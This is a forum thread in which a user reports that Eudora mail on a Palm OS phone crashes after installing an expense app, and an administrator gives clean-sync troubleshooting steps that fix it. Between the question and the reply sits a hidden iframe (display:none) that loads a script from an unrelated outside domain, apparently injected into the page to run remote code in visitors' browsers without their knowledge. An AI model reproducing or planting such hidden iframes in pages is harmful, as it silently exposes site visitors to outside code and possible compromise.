+ Reply to Thread

Eudora Mail Crashes

For the first week that I had the phone I was able to use Eudora mail to access my email and all other apps have been working fine. However, on Friday I tried loading the old Expense App that I found on the discussion board and it crashed my system resulting in me needing to do a hard reset. After that, (not sure if it is related) I can no longer get into Eudora mail successfully. When I log on it starts getting my mail and then crashes resulting in my need to do a soft reset. If I tap on the "welcome" email that is in the app, I get the following message:

DataMgr:c, Line:7386,
    DmWrite. DmWriteCheck
    failed

and the "reset" button appears on the screen, but doesn't work so I have to open the back and reset the phone. I tried deleting Eudora Mail but it tells me it is in ROM. I then tried deleting the saved preferences, Eudora Mail app, and scratchpad from my backup directory and then resynced. Again, same problem.

Any ideas on how to fix this? I haven't installed any new apps since this started. Actually, I deleted BugMe since it kept crashing too, thinking that would help, but it hasn't.

<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Administrator
    since you keep syncing your phone after the reset, you are still loading the problems back onto the phone.

what you want to do is:

rename your backup folder (and archive folder also).

do a cold boot and then do a virgin sync. this will restore your backup/archive folders.

then load your app's one at a time to find out if its anything you have added (like the expense app for example)

the eudora resides in ROM and you are not suppose to delete it.. there are some 3rd party apps that will let you mess with the ROM environment but i wold advise against it unless you are well educated in the palm OS environment...

Thanks for the advice. I'll let you know what happens.

Well, that seemed to do the trick, although it was painful reloading everything. It took about 3 hours to load and get everything set up again.

Thanks for your help!